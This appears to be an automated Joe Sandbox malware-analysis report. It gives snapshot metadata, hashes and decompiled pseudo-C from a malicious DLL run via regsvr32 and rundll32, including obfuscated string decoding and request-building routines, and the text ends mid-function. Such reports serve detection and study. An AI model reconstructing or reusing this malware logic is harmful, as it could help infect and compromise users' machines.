                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                    • Opcode ID: 9783443e3e46ce8a5ea6b2197efb8336621fd2f56c35273d238f6dade5829758
                                                                                                                                                                                                                                    • Instruction ID: ccd9283d3cc875f74be865a00d0437e225d677f1ee4955810edd154f0249f0f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9783443e3e46ce8a5ea6b2197efb8336621fd2f56c35273d238f6dade5829758
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE06DB3901224E78B219AE5AC48CAFBBADEE89721B044C17FA0097154C724CC188BA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 0d6bc532dd3603f94265a50da0cdad78e674673c34ddb561b1270d8f1e5428e6
                                                                                                                                                                                                                                    • Instruction ID: 21ab31a3fa309a3778954674fea0853346ddd06ff017b425435b42c18f48d353
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d6bc532dd3603f94265a50da0cdad78e674673c34ddb561b1270d8f1e5428e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7812BB5A00605AFDB14DFA9D894AEEB7F9EF4C310F14812DE515D7240E770E945CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E031B8B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				intOrPtr _t92;
                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                                    				intOrPtr* _t108;
                                                                                                                                                                                                                                    				intOrPtr* _t110;
                                                                                                                                                                                                                                    				intOrPtr* _t112;
                                                                                                                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                                                                                                                    				intOrPtr _t116;
                                                                                                                                                                                                                                    				intOrPtr _t121;
                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                    				intOrPtr* _t128;
                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                    				void* _t140;
                                                                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                                                    				intOrPtr* _t148;
                                                                                                                                                                                                                                    				intOrPtr* _t149;
                                                                                                                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                                                                                                                    				void* _t153;
				void* _t155;

				_t138 = __edx;
				_t129 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					__imp__();
				}
				_t60 =  *0x31bd018; // 0x99d5691b
				asm("bswap eax");
				_t61 =  *0x31bd014; // 0x3a87c8cd
				_t127 = _a16;
				_t146 =  *0x31bd120; // 0x73fcc740
				asm("bswap eax");
				_t62 =  *0x31bd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x31bd00c; // 0x62819102
				asm("bswap eax");
				_t64 =  *0x31bd27c; // 0x1faa5a8
				_t3 = _t64 + 0x31be633; // 0x74666f73
				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x31bd02c,  *0x31bd004, _t59);
				_t68 =  *0x31bd27c; // 0x1faa5a8
				_t4 = _t68 + 0x31be673; // 0x74707526
				_t71 =  *_t146(_t139 + _t127, _t4, E031B1C1A());
				_t155 = _t153 + 0x38;
				_t140 = _t139 + _t71; // executed
				_t72 = E031B54BC(_t129); // executed
				_t128 = __imp__; // 0x76d25520
				_v8 = _t72;
				if(_t72 != 0) {
					_t121 =  *0x31bd27c; // 0x1faa5a8
					_t7 = _t121 + 0x31be8eb; // 0x736e6426
					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
					_t155 = _t155 + 0xc;
					_t140 = _t140 + _t125;
					 *_t128( *0x31bd238, 0, _v8);
				}
				_t73 = E031B7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t116 =  *0x31bd27c; // 0x1faa5a8
					_t11 = _t116 + 0x31be8f3; // 0x6f687726
					 *_t146(_t140 + _a16, _t11, _t73);
					_t155 = _t155 + 0xc;
					 *_t128( *0x31bd238, 0, _v8);
				}
				_t141 =  *0x31bd32c; // 0x51695b0
				_t75 = E031B9395(0x31bd00a, _t141 + 4);
				_t147 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					 *_t128( *0x31bd238, _t147, _a16); // executed
					return _v12;
				} else {
					__imp__( *0x31bd238, 0, 0x800);
					_v8 = _t75;
					if(_t75 == 0) {
						L25:
						 *_t128( *0x31bd238, _t147, _v20);
						goto L26;
					}
					__imp__();
					E031B7A80(_t75);
					_t80 =  *0x31bd32c; // 0x51695b0
					__imp__(_t80 + 0x40);
					asm("lock xadd [eax], ecx");
					_t84 =  *0x31bd32c; // 0x51695b0
					__imp__(_t84 + 0x40);
					_t86 =  *0x31bd32c; // 0x51695b0
					_t143 = E031B8307(1, _t138, _a16,  *_t86);
					_v28 = _t143;
					asm("lock xadd [eax], ecx");
					if(_t143 == 0) {
						L24:
						 *_t128( *0x31bd238, _t147, _v8);
						goto L25;
					}
					 *0x31bd104(_t143, 0x31bc2ac);
					_push(_t143);
					_t92 = E031B3CC8();
					_v16 = _t92;
					if(_t92 == 0) {
						L23:
						 *_t128( *0x31bd238, _t147, _t143);
						goto L24;
					}
					_t148 = __imp__; // 0x76d68170
					 *_t148(_t143, _a4);
					 *_t148(_v8, _v20);
					_t149 = __imp__; // 0x76d681d0
					 *_t149(_v8, _v16);
					 *_t149(_v8, _t143);
					_t99 = E031B809F(0, _v8);
					_a4 = _t99;
					if(_t99 == 0) {
						_v12 = 8;
						L21:
						E031BA1B0();
						L22:
						 *_t128( *0x31bd238, 0, _v16);
						_t147 = 0;
						goto L23;
					}
					_t103 = E031B43DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
					_v12 = _t103;
					if(_t103 == 0) {
						_t152 = _v24;
						_t107 = E031B163F(_t152, _a4, _a8, _a12); // executed
						_v12 = _t107;
						_t108 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
						_t110 =  *((intOrPtr*)(_t152 + 8));
						 *((intOrPtr*)( *_t110 + 8))(_t110);
						_t112 =  *((intOrPtr*)(_t152 + 4));
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_t114 =  *_t152;
						_t103 = E031B9039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t103 = _a8;
							if(_t103 != 0) {
								_t144 =  *_t103;
								_t150 =  *_a12;
								_push( *_a12);
								_push(_t144);
								_push(_t144);
								L031B8F0A();
								_t103 = E031B85DB(_t144, _t144, _t150 >> 1);
								_t143 = _v28;
								 *_a12 = _t103;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E031B9039(_t103, _a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                                    0x031b8df9
                                                                                                                                                                                                                                    0x031b8dfa
                                                                                                                                                                                                                                    0x031b8dfb
                                                                                                                                                                                                                                    0x031b8dfc
                                                                                                                                                                                                                                    0x031b8e09
                                                                                                                                                                                                                                    0x031b8e11
                                                                                                                                                                                                                                    0x031b8e14
                                                                                                                                                                                                                                    0x031b8e14
                                                                                                                                                                                                                                    0x031b8df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8ddb
                                                                                                                                                                                                                                    0x031b8ddf
                                                                                                                                                                                                                                    0x031b8e16
                                                                                                                                                                                                                                    0x031b8e19
                                                                                                                                                                                                                                    0x031b8e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8e22
                                                                                                                                                                                                                                    0x031b8de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b8de1
                                                                                                                                                                                                                                    0x031b8dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 8b4136f8c6aa4fd39d1cea170d29073ee0ff17a97f096106fc407236867b4f01
                                                                                                                                                                                                                                    • Instruction ID: b3e0e31f6f21930f8df31dd0afaf0550ba042caf5ac1afcbb3c3ce53116186fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b4136f8c6aa4fd39d1cea170d29073ee0ff17a97f096106fc407236867b4f01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D915B75900248EFCB19EFA9EC84A9EBBB9EF4C750F144055F448E7260EB31D991DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 44c3e3a2fb093bf37641982dd05cc8a6c4bbec2090fbf5fcaabe32e2ba0889d1
                                                                                                                                                                                                                                    • Instruction ID: a4d3953066313405d996797c1d2a7d5fc78257058675115c559626343985d403
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44c3e3a2fb093bf37641982dd05cc8a6c4bbec2090fbf5fcaabe32e2ba0889d1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E48159B5D00209AFDF15DFA5DC84AEEBBB9FF4C300F1541AAE545E6250E7309A84CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E031B225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
	void* _t65;

	_t58 = __edx;
	_v20 = 0;
	_v8 = 0;
	_v12 = 0;
	_t21 = E031B550E();
	if(_t21 != 0) {
		_t56 =  *0x31bd25c; // 0x4000000a
		_t52 = (_t56 & 0xf0000000) + _t21;
		 *0x31bd25c = (_t56 & 0xf0000000) + _t21;
	}
	_t22 =  *0x31bd164(0, 2); // executed
	_v16 = _t22;
	if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
		_t25 = E031B3D0D( &_v8,  &_v20); // executed
		_t51 = _t25;
		_t26 =  *0x31bd27c; // 0x1faa5a8
		if( *0x31bd25c > 5) {
			_t8 = _t26 + 0x31be5cd; // 0x4d283a53
			_t27 = _t8;
		} else {
			_t7 = _t26 + 0x31bea15; // 0x44283a44
			_t27 = _t7;
		}
		E031B1BF4(_t27, _t27);
		_t31 = E031B1B2F(_t58,  &_v20,  &_v12); // executed
		if(_t31 == 0) {
			__imp__(_v20);
		}
		_t59 = 5;
		if(_t51 != _t59) {
			 *0x31bd270 =  *0x31bd270 ^ 0x81bbe65d;
			_t32 = E031B2049(_t31, 0x60);
			__eflags = _t32;
			 *0x31bd32c = _t32;
			if(_t32 == 0) {
				_push(8);
				_pop(0);
			} else {
				L031BA7BC();
				_t47 =  *0x31bd32c; // 0x51695b0
				_t65 = _t65 + 0xc;
				__imp__(_t47 + 0x40, _t32, 0, 0x60);
				_t49 =  *0x31bd32c; // 0x51695b0
				 *_t49 = 0x31be836;
			}
			__eflags = 0;
			_t51 = 0;
			if(0 == 0) {
				__imp__( *0x31bd238, 0, 0x43);
				__eflags = 0;
				 *0x31bd2c4 = 0;
				if(0 == 0) {
					_push(8);
					_pop(0);
				} else {
					_t53 =  *0x31bd25c; // 0x4000000a
					_t58 = _t53 & 0x000000ff;
					_t55 =  *0x31bd27c; // 0x1faa5a8
					_t13 = _t55 + 0x31be55a; // 0x697a6f4d
					_t52 = _t13;
					 *0x31bd120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x31bc2a7);
				}
				__eflags = 0;
				_t51 = 0;
				if(0 == 0) {
					asm("sbb eax, eax");
					E031B269C( ~_v8 &  *0x31bd270, 0x31bd00c); // executed
					_t41 = E031B4094(_t52); // executed
					_t51 = _t41;
					__eflags = _t51;
					if(_t51 != 0) {
						goto L30;
					}
					_t42 = E031B96A4(_t52); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _v8;
						_t62 = _v12;
						if(_v8 != 0) {
							L29:
							_t43 = E031B6786(_t58, _t62, _v8); // executed
							_t51 = _t43;
							goto L30;
						}
						__eflags = _t62;
						if(__eflags == 0) {
							goto L30;
						}
						_t45 = E031B3DD9(__eflags, _t62 + 4); // executed
						_t51 = _t45;
						__eflags = _t51;
						if(_t51 == 0) {
							goto L30;
						}
						goto L29;
					}
					_t51 = 8;
				}
			}
		} else {
			_t63 = _v12;
			if(_t63 == 0) {
				L30:
				if(_v16 == 0 || _v16 == 1) {
					 *0x31bd160();
				}
				goto L34;
			}
			_t64 = _t63 + 4;
			do {
			} while (E031BA501(_t59, _t64, 0, 1) == 0x4c7);
		}
		goto L30;
	} else {
		_t51 = _t22;
		L34:
		return _t51;
	}
}
                                                                                                                                                                                                                                    0x031b22ec
                                                                                                                                                                                                                                    0x031b22f1
                                                                                                                                                                                                                                    0x031b22f1
                                                                                                                                                                                                                                    0x031b22f9
                                                                                                                                                                                                                                    0x031b22fc
                                                                                                                                                                                                                                    0x031b2322
                                                                                                                                                                                                                                    0x031b232e
                                                                                                                                                                                                                                    0x031b2333
                                                                                                                                                                                                                                    0x031b2335
                                                                                                                                                                                                                                    0x031b233a
                                                                                                                                                                                                                                    0x031b2366
                                                                                                                                                                                                                                    0x031b2368
                                                                                                                                                                                                                                    0x031b233c
                                                                                                                                                                                                                                    0x031b2340
                                                                                                                                                                                                                                    0x031b2345
                                                                                                                                                                                                                                    0x031b234a
                                                                                                                                                                                                                                    0x031b2351
                                                                                                                                                                                                                                    0x031b2357
                                                                                                                                                                                                                                    0x031b235c
                                                                                                                                                                                                                                    0x031b2362
                                                                                                                                                                                                                                    0x031b2369
                                                                                                                                                                                                                                    0x031b236b
                                                                                                                                                                                                                                    0x031b236d
                                                                                                                                                                                                                                    0x031b237c
                                                                                                                                                                                                                                    0x031b2382
                                                                                                                                                                                                                                    0x031b2384
                                                                                                                                                                                                                                    0x031b2389
                                                                                                                                                                                                                                    0x031b23b9
                                                                                                                                                                                                                                    0x031b23bb
                                                                                                                                                                                                                                    0x031b238b
                                                                                                                                                                                                                                    0x031b238b
                                                                                                                                                                                                                                    0x031b2391
                                                                                                                                                                                                                                    0x031b239e
                                                                                                                                                                                                                                    0x031b23a4
                                                                                                                                                                                                                                    0x031b23a4
                                                                                                                                                                                                                                    0x031b23ac
                                                                                                                                                                                                                                    0x031b23b5
                                                                                                                                                                                                                                    0x031b23bc
                                                                                                                                                                                                                                    0x031b23be
                                                                                                                                                                                                                                    0x031b23c0
                                                                                                                                                                                                                                    0x031b23c7
                                                                                                                                                                                                                                    0x031b23d4
                                                                                                                                                                                                                                    0x031b23d9
                                                                                                                                                                                                                                    0x031b23de
                                                                                                                                                                                                                                    0x031b23e0
                                                                                                                                                                                                                                    0x031b23e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b23e4
                                                                                                                                                                                                                                    0x031b23e9
                                                                                                                                                                                                                                    0x031b23eb
                                                                                                                                                                                                                                    0x031b23f2
                                                                                                                                                                                                                                    0x031b23f6
                                                                                                                                                                                                                                    0x031b23f9
                                                                                                                                                                                                                                    0x031b240e
                                                                                                                                                                                                                                    0x031b2412
                                                                                                                                                                                                                                    0x031b2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2417
                                                                                                                                                                                                                                    0x031b23fb
                                                                                                                                                                                                                                    0x031b23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2403
                                                                                                                                                                                                                                    0x031b2408
                                                                                                                                                                                                                                    0x031b240a
                                                                                                                                                                                                                                    0x031b240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b240c
                                                                                                                                                                                                                                    0x031b23ef
                                                                                                                                                                                                                                    0x031b23ef
                                                                                                                                                                                                                                    0x031b23c0
                                                                                                                                                                                                                                    0x031b22fe
                                                                                                                                                                                                                                    0x031b22fe
                                                                                                                                                                                                                                    0x031b2303
                                                                                                                                                                                                                                    0x031b2419
                                                                                                                                                                                                                                    0x031b241d
                                                                                                                                                                                                                                    0x031b2425
                                                                                                                                                                                                                                    0x031b2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b241d
                                                                                                                                                                                                                                    0x031b2309
                                                                                                                                                                                                                                    0x031b230c
                                                                                                                                                                                                                                    0x031b2316
                                                                                                                                                                                                                                    0x031b231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b242d
                                                                                                                                                                                                                                    0x031b242d
                                                                                                                                                                                                                                    0x031b2431
                                                                                                                                                                                                                                    0x031b2435
                                                                                                                                                                                                                                    0x031b2435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 11952dba3c17b916c39bd272b776746ef77edfecb138356ef2e1e7500d798f2c
                                                                                                                                                                                                                                    • Instruction ID: 378a20251d5a4016f5bea4c4a5148330c9c243b8f5505a2873e6f47449de1fde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11952dba3c17b916c39bd272b776746ef77edfecb138356ef2e1e7500d798f2c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7351D975A10215ABDB29EFA5EC84BDE77BCAB0C704F1848A6E501D7240F774D98ACB70
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 250 31b3dd9-31b3e1b call 31ba7bc call 31b6a12 255 31b3f69-31b3f6b 250->255 256 31b3e21-31b3e2c 250->256 257 31b3f6c-31b3f72 255->257 259 31b3e33-31b3e35 256->259 260 31b3e3b-31b3e47 call 31ba72d 259->260 261 31b3f5c-31b3f5e 259->261 267 31b3e49 260->267 268 31b3e4c-31b3e5e call 31b809f 260->268 262 31b3f5f-31b3f67 call 31b9039 261->262 262->257 267->268 271 31b3f4b-31b3f4d 268->271 272 31b3e64-31b3e80 call 31b809f 268->272 274 31b3f4e-31b3f53 271->274 277 31b3e82-31b3e9f call 31b6bfa call 31b9039 272->277 278 31b3ea1-31b3ea3 272->278 274->262 276 31b3f55-31b3f5a call 31b1f99 274->276 276->262 282 31b3ea4-31b3ea6 277->282 278->282 284 31b3eac-31b3eb3 282->284 285 31b3f41-31b3f49 call 31b9039 282->285 288 31b3eb5-31b3ecc call 31b809f 284->288 289 31b3ef4-31b3f1f call 31b8f83 call 31b1c74 284->289 285->274 297 31b3ece-31b3eeb call 31b6bfa call 31b9039 288->297 298 31b3eed-31b3eef 288->298 303 31b3f39-31b3f3c call 31b9039 289->303 304 31b3f21-31b3f37 call 31b42ea 289->304 299 31b3ef0-31b3ef2 297->299 298->299 299->285 299->289 303->285 304->303
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E031B3DD9(void* __eflags, char _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(0x2c);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( &_v84);
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				L031BA7BC();
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t39 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t5 = _t39 + 0x31bee40; // 0x410025
                                                                                                                                                                                                                                    				_t41 = E031B6A12(_t5);
                                                                                                                                                                                                                                    				_t75 = _t41;
                                                                                                                                                                                                                                    				_v16 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t70;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(_t75);
                                                                                                                                                                                                                                    				_t43 =  *0x31bd114(_t75, _a4, _t41); // executed
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t70 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E031B9039(_t43, _v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E031BA72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = E031B809F(0,  *0x31bd33c);
                                                                                                                                                                                                                                    				_v12 = _t43;
                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t48 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    					_t11 = _t48 + 0x31be81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t51 = E031B809F(0, _t11);
                                                                                                                                                                                                                                    					_t77 = _t51;
                                                                                                                                                                                                                                    					if(_t51 == 0) {
                                                                                                                                                                                                                                    						_t70 = 8;
                                                                                                                                                                                                                                    					} else {
